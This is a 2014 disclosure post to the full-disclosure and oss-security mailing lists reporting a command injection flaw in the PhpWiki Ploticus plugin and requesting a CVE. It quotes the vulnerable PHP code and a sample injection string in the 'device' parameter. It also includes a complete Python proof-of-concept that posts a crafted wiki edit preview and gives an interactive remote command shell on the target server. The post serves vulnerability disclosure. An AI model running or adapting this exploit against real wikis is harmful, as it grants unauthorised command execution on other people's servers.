Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Wed, 27 Aug 2014 23:23:45 +0100
From: "Benjamin Harris" <bch@...h.ai>
To: fulldisclosure@...lists.org, oss-security@...ts.openwall.com
Subject: PHP-Wiki Command Injection

Hi All

OSS-Security, can I get a CVE for this please?

URL: https://sourceforge.net/projects/phpwiki/

I tried to report this a month ago, but got no response from the 
developers. This is an old vulnerability I found while dusting off 
some old hard drives.

Brief:
-------------------------

PhpWiki is a WikiWikiWeb clone in PHP. A WikiWikiWeb is a site 
where anyone can edit the pages through an HTML form. Multiple 
storage backends, dynamic hyperlinking, themeable, scriptable by 
plugins, full authentication, ACL's.


Details:
--------------------------

Straight command injection in the Ploticus module. Attached is a 
working POC.

I found these notes I made:

<<Ploticus device=";touch /tmp/owned;" -prefab= -csmap= data= alt= 
help= >>
$ ls -la owned
-rw-r--r-- 1 apache apache 0 Jan 18 15:23 owned


vuln code with system execute at the bottom
controllable param is $args
           $gif = $argarray['device'];
            $args = "-$gif -o $tempfile.$gif";
                $code = $this->execute(PLOTICUS_EXE . " 
$tempfile.plo $args", $tempfile.".$gif");

['device'] is listed as an option by user when using the Politus 
plugin
"


example usage;
 <?plugin Ploticus device||=png [ploticus options...]
     multiline ploticus script ...
  ?>

:>> 

   function getImage($dbi, $argarray, $request) {
        //extract($this->getArgs($argstr, $request));
        //extract($argarray);
        $source =& $this->source;
        if (!empty($source)) {
            if ($this->withShellCommand($source)) {
                $this->_errortext .= _("shell commands not allowed 
in Ploticus");
                return false;
            }
            if (is_array($argarray['data'])) { // support <!plugin-
list !> pagelists
                $src = "#proc getdata\ndata:";
                $i = 0;
                foreach ($argarray['data'] as $data) {
                    // hash or array?
                    if (is_array($data))
                        $src .= ("\t" . join(" ", $data) . "\n");
                    else
                        $src .= ("\t" . '"' . $data . '" ' . $i++ . 
"\n");
                }
                $src .= $source;
                $source = $src;
            }
            $tempfile = $this->tempnam('Ploticus','plo');
            @unlink($tempfile);
            $gif = $argarray['device'];
            $args = "-$gif -o $tempfile.$gif";
            if (!empty($argarray['-csmap'])) {
                    $args .= " -csmap -mapfile $tempfile.map";
                    $this->_mapfile = "$tempfile.map";
            }
            if (!empty($argarray['-prefab'])) {
                    //check $_ENV['PLOTICUS_PREFABS'] and default 
directory
                global $HTTP_ENV_VARS;
                if (empty($HTTP_ENV_VARS['PLOTICUS_PREFABS'])) {
                    if (file_exists("/usr/share/ploticus"))
                        $HTTP_ENV_VARS['PLOTICUS_PREFABS'] = 
"/usr/share/ploticus";
                    elseif (defined('PLOTICUS_PREFABS'))
                        $HTTP_ENV_VARS['PLOTICUS_PREFABS'] = 
constant('PLOTICUS_PREFABS');
                }
                    $args .= (" -prefab " . $argarray['-prefab']);
            }
            if (isWindows()) {
                $fp = fopen("$tempfile.plo", "w");
                fwrite ($fp, $source);
                fclose($fp);
                $code = $this->execute(PLOTICUS_EXE . " 
$tempfile.plo $args", $tempfile.".$gif");

Many thanks,
Ben
###############################################################
#    ____                    __                  _ __   _ 
#   / __/_  ______ _  ____  / /_  ____ _      __(_) /__(_)
#  / /_/ / / / __ `/ / __ \/ __ \/ __ \ | /| / / / //_/ / 
# / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,< / /  
#/_/  \__,_/\__, (_) .___/_/ /_/ .___/|__/|__/_/_/|_/_/   
#             /_/ /_/         /_/                     
# Diskovered in Nov/Dec 2011
###############################################################

import urllib
import urllib2
import sys
def banner():
	print "	    ____                    __                  _ __   _ "
	print "	   / __/_  ______ _  ____  / /_  ____ _      __(_) /__(_)"
	print "	  / /_/ / / / __ `/ / __ \/ __ \/ __ \ | /| / / / //_/ / "
	print "	 / __/ /_/ / /_/ / / /_/ / / / / /_/ / |/ |/ / / ,< / /  "
	print "	/_/  \__,_/\__, (_) .___/_/ /_/ .___/|__/|__/_/_/|_/_/   "
	print "	             /_/ /_/         /_/                     \n"


def usage():
	banner()
	print "	[+] Usage example"
	print "	[-] python " + sys.argv[0] + " http://path.to/wiki"

if len(sys.argv)< 2:
	usage()
	quit()

domain = sys.argv[1]
def commandexec(cmd):
	data = urllib.urlencode([('pagename','HeIp'),('edit[content]','<<Ploticus device=";echo 123\':::\' 1>&2;'+cmd+' 1>&2;echo \':::\'123 1>&2;" -prefab= -csmap= data= alt= help= >>'),('edit[preview]','Preview'),('action','edit')])
	cmd1 = urllib2.Request(domain +'/index.php/HeIp',data)
	cmd2 = urllib2.urlopen(cmd1)
	output = cmd2.read()
	firstloc = output.find("123:::\n") + len("123:::\n")
	secondloc = output.find("\n:::123")
	return output[firstloc:secondloc]


banner()
print commandexec('uname -a')
print commandexec('id')
while(quit != 1):
	cmd = raw_input('Run a command: ')
	if cmd == 'quit':
		print "[-] Hope you had fun :)"
		quit = 1
	if cmd != 'quit':
		print commandexec(cmd)

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ